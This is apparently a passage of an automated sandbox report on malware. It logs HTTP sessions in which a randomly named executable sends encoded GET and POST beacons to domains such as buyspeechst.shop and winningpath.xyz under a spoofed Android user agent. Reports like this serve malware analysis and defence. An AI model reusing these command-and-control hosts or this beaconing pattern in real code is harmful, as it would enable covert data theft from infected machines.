                                                                                                                    Data Raw: 6e 7a 73 30 54 32 3d 68 5a 41 61 42 72 78 78 31 4b 46 50 4f 41 4f 46 46 67 44 51 6e 6b 4c 4a 6b 65 36 66 6f 57 4a 6c 6d 6c 6f 32 31 4b 37 70 30 78 67 32 41 79 4a 34 75 75 6b 2b 4f 73 57 6f 75 59 76 46 2f 78 62 67 73 39 66 59 2b 51 44 5a 56 50 36 4c 37 75 53 79 7a 6a 7a 45 46 35 56 56 35 36 2b 78 57 74 7a 78 30 74 55 2b 35 50 68 39 51 4b 71 4b 33 78 4a 5a 5a 34 52 4f 32 63 76 4a 72 37 73 53 6a 75 75 4e 37 5a 2f 30 5a 39 76 5a 78 49 6b 7a 44 51 31 64 76 34 53 52 69 56 4c 71 6c 36 73 49 73 4c 52 49 53 50 70 38 4f 4a 58 78 4e 6f 58 75 70 73 44 33 4c 71 30 50 44 76 78 72 49 61 67 67 30 5a 72 4d 45 63 72 2b 64 4b 55 35 68 71 69 58 46 54 66 68 6e 71 38 4a 48 58 53 6e 6a 4d 4c 4e 50 75 75 6a 69 78 44 2b 70 76 4b 73 53 31 62 71 65 63 59 2b 62 36 41 41 79 62 65 45 53 2f 4c 76 46 68 6f 4e 37 50 56 66 49 69 43 45 50 5a 52 46 65 51 69 4a 55 64 55 4c 34 78 4a 6a 59 78 47 79 36 75 78 45 76 5a 63 59 61 63 74 6e 4d 53 46 74 2f 5a 6c 70 44 6c 4e 68 4f 59 43 64 5a 58 77 76 66 2b 6c 42 2b 68 6a 69 48 52 69 7a 61 7a 55 [TRUNCATED]
                                                                                                                    Data Ascii: nzs0T2=hZAaBrxx1KFPOAOFFgDQnkLJke6foWJlmlo21K7p0xg2AyJ4uuk+OsWouYvF/xbgs9fY+QDZVP6L7uSyzjzEF5VV56+xWtzx0tU+5Ph9QKqK3xJZZ4RO2cvJr7sSjuuN7Z/0Z9vZxIkzDQ1dv4SRiVLql6sIsLRISPp8OJXxNoXupsD3Lq0PDvxrIagg0ZrMEcr+dKU5hqiXFTfhnq8JHXSnjMLNPuujixD+pvKsS1bqecY+b6AAybeES/LvFhoN7PVfIiCEPZRFeQiJUdUL4xJjYxGy6uxEvZcYactnMSFt/ZlpDlNhOYCdZXwvf+lB+hjiHRizazUqEJ/Njs3pVtUyTL85rQ1pvj65bR2LK1pOcS+0EvHiJIAL7C1h3Lbv6TjgQAw361U1WeQhLm+ZEIeyGGn+puvG0XoR+KqQWpoGX6p5MTs6VYzMv90QhkPhxqD03N7hQ4c09Uq7lyCFM+MA9jE2nZJgHZGuTGlaCQmYzzpUuW0xDF53DuCdJm+6smeHYZmXwr8PWoC69bc7ATwSkvG450o7htO79TpFroJZQ+tL/bJEN9hvwr+EMWDqG34tJtnRrJ/rJzPev4MCdj5oRKUT/jqvOBr2IDAIC3ZD2Sk9QGNPNZR7DoVD2nyVLGGNVeM7gDmXt0uxCrkIGqWAD5S/y84OAsD9GlPCk1TZd6fV6ETmDpBEC+XZuXGS9ZiCwsZzhhrIQvgvQRBdV0mMZGtFoiXhzoSBqR4TWG1uNpYb53iM7LwtqpBtgCsTTF9a2Lubt5m8mnJhlXVAPuISap6WK5wRylb4D2Ix8WRN/wd++Ljo0WEFa5rp9ocvgdBIoCL0TrUzbUn8lIqdFF4epsRM/24ZghIcxL1Jyrsrd/kjMXnW/ye1AHOVAKBVqWWsAkKD7ensIE7LyU+TbZpV1a4nEk6usueCnRx4gXGK6Y46uFJfSEixtWdv05aBzVSDDH98HTPUpTlLIJYfzgPfrtEHhvgwxUF6WV0WA6m+9 [TRUNCATED]
                                                                                                                    Jan 10, 2025 20:49:15.854110956 CET533INHTTP/1.1 404 Not Found
                                                                                                                    Date: Fri, 10 Jan 2025 19:49:15 GMT
                                                                                                                    Server: Apache
                                                                                                                    Content-Length: 389
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    4192.168.2.649990209.74.79.41802196C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 10, 2025 20:49:17.863284111 CET586OUTGET /4p8s/?mLFl=BXYPt2lXBpi8Dj&nzs0T2=sbo6CbF7xq9vaRi3YzuXiH7G7PCaul9K2GcB+IL1+35GAWVPgulqGeXZ6bn3jQiNs+qV6ADqYtqo2KT+0SDqdopb2qyXeoTz6pIh8vt4eZWlyhEkc4Yu1dj816xA9fmF7Yf8BYw= HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.winningpath.xyz
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
                                                                                                                    Jan 10, 2025 20:49:18.456195116 CET548INHTTP/1.1 404 Not Found
                                                                                                                    Date: Fri, 10 Jan 2025 19:49:18 GMT
                                                                                                                    Server: Apache
                                                                                                                    Content-Length: 389
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    5192.168.2.649991104.21.112.1802196C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 10, 2025 20:49:23.523698092 CET848OUTPOST /qzi3/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.buyspeechst.shop
                                                                                                                    Origin: http://www.buyspeechst.shop
                                                                                                                    Referer: http://www.buyspeechst.shop/qzi3/
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 211
                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
                                                                                                                    Data Raw: 6e 7a 73 30 54 32 3d 55 75 46 51 56 56 2f 79 7a 32 42 72 57 79 6f 77 39 55 6e 65 4b 65 2f 36 4e 36 49 45 51 5a 58 77 35 46 5a 75 4a 74 65 48 42 30 72 38 68 31 61 75 56 66 6a 44 75 51 71 74 52 38 30 56 69 31 47 37 46 4d 74 74 77 66 69 33 6b 50 47 56 57 74 4d 58 75 62 71 30 56 49 78 32 7a 4d 7a 30 51 30 50 43 67 63 4c 31 69 64 41 7a 48 6c 47 67 30 4a 33 51 39 6e 7a 54 4a 4b 31 4d 78 71 49 51 47 4c 74 5a 6f 6f 57 59 71 37 6e 36 6e 33 5a 33 6f 4e 46 58 37 57 32 57 79 65 74 6a 32 48 58 36 42 4c 78 66 49 30 6a 69 31 64 4c 6f 4f 65 6e 56 79 73 68 62 6f 52 57 6c 6d 2b 4b 6e 55 56 7a 6f 58 77 39 55 6a 71 46 70 57 74 4c 42 41 69 30 65
                                                                                                                    Data Ascii: nzs0T2=UuFQVV/yz2BrWyow9UneKe/6N6IEQZXw5FZuJteHB0r8h1auVfjDuQqtR80Vi1G7FMttwfi3kPGVWtMXubq0VIx2zMz0Q0PCgcL1idAzHlGg0J3Q9nzTJK1MxqIQGLtZooWYq7n6n3Z3oNFX7W2Wyetj2HX6BLxfI0ji1dLoOenVyshboRWlm+KnUVzoXw9UjqFpWtLBAi0e
                                                                                                                    Jan 10, 2025 20:49:24.120701075 CET1068INHTTP/1.1 404 Not Found
                                                                                                                    Date: Fri, 10 Jan 2025 19:49:24 GMT
                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yr537pJa80uD7vS8N5O%2BQqLW%2BhqzOMpDZF8PyFaPUKIXAj8eVc9eBAl6QZknnpRsyyr%2Bf8mhOFG6%2F82Hp1kHR9vArBt2kEw%2F4OjxRrWVDrXyCkb054B5s%2BgpqzFMhmLUerI4YN%2BOEg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8fff30a87f1e0f5b-EWR
                                                                                                                    Content-Encoding: gzip
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1635&min_rtt=1635&rtt_var=817&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=848&delivery_rate=0&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                    Data Raw: 65 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 6e c2 30 10 44 ef fe 8a 2d 77 b2 01 71 e8 61 65 a9 25 41 45 0a 34 6a cd 81 a3 c1 5b 19 89 c6 c6 de 34 e2 ef ab 04 55 ea 75 e6 cd 68 86 9e aa f7 b5 39 b6 35 bc 99 5d 03 ed e1 b5 d9 ae 61 36 47 dc d6 66 83 58 99 ea e1 2c 8b 12 b1 de cf b4 22 2f df 57 4d 9e ad d3 8a e4 22 57 d6 ab 72 05 fb 20 b0 09 7d e7 08 1f a2 22 9c 20 3a 05 77 1f 73 0b fd 8f f1 0b ad 28 6a e3 19 12 df 7a ce c2 0e 0e 1f 0d 0c 36 43 17 04 be 46 0e 42 07 e2 2f 19 32 a7 1f 4e 05 61 1c 9b 92 56 64 9d 4b 9c b3 7e 89 f6 ec 19 3e 27 00 ac c0 30 0c c5 a9 bf e7 c8 7c f6 59 8a ec 43 84 36 24 81 e7 92 f0 2f a6 08 a7 5d 84 d3 9f 5f 00 00 00 ff ff e3 02 00 2b bb 83 fa 0a 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: e3Ln0D-wqae%AE4j[4Uuh95]a6GfX,"/WM"Wr }" :ws(jz6CFB/2NaVdK~>'0|YC6$/]_+0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    6192.168.2.649993104.21.112.1802196C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 10, 2025 20:49:26.087872982 CET872OUTPOST /qzi3/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.buyspeechst.shop
                                                                                                                    Origin: http://www.buyspeechst.shop
                                                                                                                    Referer: http://www.buyspeechst.shop/qzi3/
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 235
                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
                                                                                                                    Data Raw: 6e 7a 73 30 54 32 3d 55 75 46 51 56 56 2f 79 7a 32 42 72 57 54 34 77 75 6e 50 65 64 4f 2f 35 43 61 49 45 61 35 58 30 35 46 46 75 4a 73 4b 58 42 43 37 38 6d 52 4b 75 48 75 6a 44 74 51 71 74 5a 63 30 51 73 56 47 4f 46 4d 68 6c 77 65 65 33 6b 50 43 56 57 74 63 58 75 73 65 33 55 59 78 34 38 73 7a 32 64 55 50 43 67 63 4c 31 69 64 55 4e 48 6c 65 67 30 35 48 51 2f 45 72 4d 4b 4b 31 50 32 71 49 51 43 4c 74 64 6f 6f 57 41 71 36 36 76 6e 78 64 33 6f 4a 42 58 37 48 32 56 34 65 74 68 72 58 58 6b 47 61 41 55 49 30 53 61 71 4f 72 4c 52 64 72 57 2b 36 38 42 30 69 57 47 30 75 71 6c 55 58 72 61 58 51 39 2b 68 71 39 70 45 36 48 6d 50 57 52 39 4c 4b 59 31 4d 31 39 74 6f 4b 4e 35 52 7a 4c 54 54 71 46 46 41 41 3d 3d
                                                                                                                    Data Ascii: nzs0T2=UuFQVV/yz2BrWT4wunPedO/5CaIEa5X05FFuJsKXBC78mRKuHujDtQqtZc0QsVGOFMhlwee3kPCVWtcXuse3UYx48sz2dUPCgcL1idUNHleg05HQ/ErMKK1P2qIQCLtdooWAq66vnxd3oJBX7H2V4ethrXXkGaAUI0SaqOrLRdrW+68B0iWG0uqlUXraXQ9+hq9pE6HmPWR9LKY1M19toKN5RzLTTqFFAA==
                                                                                                                    Jan 10, 2025 20:49:26.676137924 CET1071INHTTP/1.1 404 Not Found
                                                                                                                    Date: Fri, 10 Jan 2025 19:49:26 GMT
                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pzVcWSeeme6ttx0wfXPh57EmL0xkBVRfl8OFbe63aaWYakdL7xMSY7oF%2FNL15I2jzBiE0Ak%2FcJ380fSnsJRb%2FApe6D3Sj%2BZo8N6FicQpmQJ19vAJFO8xB0r3r9OL%2Bceu%2BRcNlk5zDw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8fff30b87b550f5b-EWR
                                                                                                                    Content-Encoding: gzip
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1647&min_rtt=1647&rtt_var=823&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=872&delivery_rate=0&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                    Data Raw: 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 6e c2 30 10 44 ef fe 8a 2d 77 b2 01 71 e8 61 65 a9 25 41 45 0a 34 6a cd 81 a3 c1 5b 19 89 c6 c6 de 34 e2 ef ab 04 55 ea 75 e6 cd 68 86 9e aa f7 b5 39 b6 35 bc 99 5d 03 ed e1 b5 d9 ae 61 36 47 dc d6 66 83 58 99 ea e1 2c 8b 12 b1 de cf b4 22 2f df 57 4d 9e ad d3 8a e4 22 57 d6 ab 72 05 fb 20 b0 09 7d e7 08 1f a2 22 9c 20 3a 05 77 1f 73 0b fd 8f f1 0b ad 28 6a e3 19 12 df 7a ce c2 0e 0e 1f 0d 0c 36 43 17 04 be 46 0e 42 07 e2 2f 19 32 a7 1f 4e 05 61 1c 9b 92 56 64 9d 4b 9c b3 7e 89 f6 ec 19 3e 27 00 ac c0 30 0c c5 a9 bf e7 c8 7c f6 59 8a ec 43 84 36 24 81 e7 92 f0 2f a6 08 a7 5d 84 d3 9f 5f 00 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 2b bb 83 fa 0a 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: d8Ln0D-wqae%AE4j[4Uuh95]a6GfX,"/WM"Wr }" :ws(jz6CFB/2NaVdK~>'0|YC6$/]_b+0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    7192.168.2.649994104.21.112.1802196C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 10, 2025 20:49:28.632553101 CET1885OUTPOST /qzi3/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.buyspeechst.shop
                                                                                                                    Origin: http://www.buyspeechst.shop
                                                                                                                    Referer: http://www.buyspeechst.shop/qzi3/
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 1247
                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
                                                                                                                    Data Raw: 6e 7a 73 30 54 32 3d 55 75 46 51 56 56 2f 79 7a 32 42 72 57 54 34 77 75 6e 50 65 64 4f 2f 35 43 61 49 45 61 35 58 30 35 46 46 75 4a 73 4b 58 42 43 7a 38 6d 6a 43 75 57 39 62 44 73 51 71 74 54 38 30 52 73 56 47 54 46 4d 4a 68 77 65 53 6e 6b 4e 71 56 58 4c 51 58 6f 5a 79 33 4e 6f 78 34 33 4d 7a 7a 51 30 50 58 67 64 37 35 69 64 45 4e 48 6c 65 67 30 2f 4c 51 78 48 7a 4d 4d 4b 31 4d 78 71 49 55 47 4c 74 31 6f 6f 65 51 71 36 2b 2f 6b 42 39 33 70 74 6c 58 36 31 4f 56 6c 4f 74 2f 6f 58 57 33 47 61 4d 62 49 33 6d 67 71 50 50 74 52 66 33 57 36 4e 52 4d 78 6a 4f 34 75 4e 61 57 4b 48 79 39 57 77 4d 49 35 4d 78 74 4c 70 2f 67 48 6b 70 49 54 66 67 4b 59 55 6b 69 6f 35 70 45 66 6d 61 51 62 75 45 69 56 32 63 6e 48 63 33 32 6f 46 78 71 7a 2f 35 37 4b 6a 2f 62 31 38 65 68 73 58 65 63 6b 55 61 39 46 69 6e 5a 43 4a 69 6e 6c 6a 33 4b 4c 4b 4c 76 6e 37 6f 6d 50 6f 70 58 79 77 73 46 6a 71 77 73 74 59 74 52 39 2f 33 73 67 2f 44 4e 6b 79 71 37 4c 78 44 44 2b 4c 65 73 4b 58 68 32 2f 74 72 44 78 78 4c 32 4d 6c 67 71 30 49 4c [TRUNCATED]
                                                                                                                    Data Ascii: nzs0T2=UuFQVV/yz2BrWT4wunPedO/5CaIEa5X05FFuJsKXBCz8mjCuW9bDsQqtT80RsVGTFMJhweSnkNqVXLQXoZy3Nox43MzzQ0PXgd75idENHleg0/LQxHzMMK1MxqIUGLt1ooeQq6+/kB93ptlX61OVlOt/oXW3GaMbI3mgqPPtRf3W6NRMxjO4uNaWKHy9WwMI5MxtLp/gHkpITfgKYUkio5pEfmaQbuEiV2cnHc32oFxqz/57Kj/b18ehsXeckUa9FinZCJinlj3KLKLvn7omPopXywsFjqwstYtR9/3sg/DNkyq7LxDD+LesKXh2/trDxxL2Mlgq0IL3GYxp6MEgmVBmjcXOyouVT2BlJz1N50WfcM3u6iR3xfLHDD/EincIavn/gZOn7Gy3cZ4DhvgjhTeybVCzrGm1xNADQbgieKC4LxQnDU+ahYkch5uP2K6vk0ET5yrmRfZdcjd6kmq3QZOmpSso4bTO72SY+52SYK9fRLOfOL3waR9rp7+kcYLpnDeTjv7WmMi4cZAD3k3/xnwGiiNL2ai4YaP1HMIaEh6GMtNZGShIPXcqHy7Uzykk4vgWUIiOob27iAfRsnGW5kEr5RuZiR9MCmC33adTq70haWPgwGoli7VbqPA1pzg421ViNswvjOtVwe1lklNCWdq8vi255q4OqECexCqzA0mI2xJObjjaLnWdNvUfEfEPhT6zgOhV3Da++NgoAsgGZEu/GCPdpI+2xMF/4IVFZqra5JTIH2f3AREJXCjz5gQC4CrFA0xLvbyH0Q7iVQp9eOVY8ydYhds/s6ofuGo7osW6irp0uBUTQKBi+YtGRTk/+E3dSUe6oviP66ADU5QmjrVM9ErFvY7892p+Ik5isZZQ68CI6WZ8IL9GgulbD9Y33EDVATRAPyzzplbcKto0d52rw+6t+F2Uset9G/W5QwB4cW51re3vf3Ng5QGOVDYybXBiQGD4IDenniGQOIsc2ZG911XNt/JLzMLXvKiZ24Aij [TRUNCATED]
                                                                                                                    Jan 10, 2025 20:49:29.242144108 CET1043INHTTP/1.1 404 Not Found
                                                                                                                    Date: Fri, 10 Jan 2025 19:49:29 GMT
                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DmLav09NF1diV4TQQ10ObZImDP0HyhpxDukRJdCuQ8KTDEhhxXijN1xtcWUtPvh2sQ%2FH0vLNungj27aNSinRyp67g5iCey7N7pXul%2BUEduoivihgUyNcpK0KUcfhdwUbF2cw2dh6YQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8fff30c85eb843b3-EWR
                                                                                                                    Content-Encoding: gzip
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1606&min_rtt=1606&rtt_var=803&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1885&delivery_rate=0&cwnd=201&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                    Data Raw: 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 6e c2 30 10 44 ef fe 8a 2d 77 b2 01 71 e8 61 65 a9 25 41 45 0a 34 6a cd 81 a3 c1 5b 19 89 c6 c6 de 34 e2 ef ab 04 55 ea 75 e6 cd 68 86 9e aa f7 b5 39 b6 35 bc 99 5d 03 ed e1 b5 d9 ae 61 36 47 dc d6 66 83 58 99 ea e1 2c 8b 12 b1 de cf b4 22 2f df 57 4d 9e ad d3 8a e4 22 57 d6 ab 72 05 fb 20 b0 09 7d e7 08 1f a2 22 9c 20 3a 05 77 1f 73 0b fd 8f f1 0b ad 28 6a e3 19 12 df 7a ce c2 0e 0e 1f 0d 0c 36 43 17 04 be 46 0e 42 07 e2 2f 19 32 a7 1f 4e 05 61 1c 9b 92 56 64 9d 4b 9c b3 7e 89 f6 ec 19 3e 27 00 ac c0 30 0c c5 a9 bf e7 c8 7c f6 59 8a ec 43 84 36 24 81 e7 92 f0 2f a6 08 a7 5d 84 d3 9f 5f 00 00 00 ff ff 0d 0a
                                                                                                                    Data Ascii: d8Ln0D-wqae%AE4j[4Uuh95]a6GfX,"/WM"Wr }" :ws(jz6CFB/2NaVdK~>'0|YC6$/]_
                                                                                                                    Jan 10, 2025 20:49:29.242806911 CET21INData Raw: 62 0d 0a e3 02 00 2b bb 83 fa 0a 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: b+0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    8192.168.2.649995104.21.112.1802196C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 10, 2025 20:49:31.173302889 CET587OUTGET /qzi3/?nzs0T2=ZstwWiqc2nBlehIthXm/ZN/AUPsgXrD51lhdEOCLGCvwhgyybv3tjhbgBMsRsRSNQM92qNeXuPeIY/BunbCcNNF518/3bUb+8prHuu4wGUKr0baD/E+zEK5A15FFaZBXoYSAzP4=&mLFl=BXYPt2lXBpi8Dj HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.buyspeechst.shop
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
                                                                                                                    Jan 10, 2025 20:49:31.809032917 CET1070INHTTP/1.1 404 Not Found
                                                                                                                    Date: Fri, 10 Jan 2025 19:49:31 GMT
                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    cf-cache-status: DYNAMIC
